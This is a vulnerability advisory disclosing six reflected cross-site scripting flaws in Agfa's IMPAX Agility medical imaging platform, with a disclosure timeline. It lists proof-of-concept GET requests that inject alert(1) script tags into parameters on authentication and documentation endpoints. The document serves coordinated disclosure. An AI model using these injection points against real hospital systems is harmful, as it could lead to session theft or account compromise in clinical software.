ImPAX Agility Multiple Cross Site Scripting Vulnerabilities Tested versions: 1.1074.RC.b122.20150602 http://www.agfahealthcare.com/ Credits to: vesp3r / vesp3r7c3@gmail.com About the Product ------------------ IMPAX Agility is designed to achieve clinical productivity and improve affordability. It uses a single data model to provide a seamless system that offers relevant and varied clinical data in one, completely unified imaging management platform. IMPAX Agilitys sophisticated GUI provides users an uncluttered and intuitive user experience, as well the native diagnostic capabilities, streamlined navigation and workflow, improve clinical productivity. Its modern IT platform helps hospitals to maximize performance and control costs, by reducing overhead, upgrade time and IT infrastructure investments. Timeline contact --------------- 02/17 - initial contact 02/20 - Vendor asked for more information 03/30 - The vendor said the issue was solved 04/12 - Advisory published Reflected Cross-Site Scripting ----------------------------- 1) GET /authentication/j_security_check?ignore_expired=true&resource=%2fxero%2vtf8t3"><script>alert(1)<%2fscript>hcg7wy771pe&j_password=&j_username= HTTP/1.1 2) GET /authentication/j_security_check?vt123"><script>alert(1)<%2fscript>be4rz=1 HTTP/1.1 3) GET /docs/enterpriseviewer/knowledgebase/en/?awbkk"><script>alert(1)<%2fscript>q4kpp=1 HTTP/1.1 4) GET /docs/enterpriseviewer/knowledgebase/en/topics/8825.html?vtzi2"><script>alert(1)<%2fscript>a6wo4=1 HTTP/1.1 5) GET /authentication/token?resource=%2fdocs%2fenterpriseviewer%2fknowledgebase%2fen%2ftopics%2f124446.htmltestbug"><script>alert(1)<%2fscript>ahz3a HTTP/1.1 6) GET /authentication/token?khr8y"><script>alert(1)<%2fscript>tn1f0=1 HTTP/1.1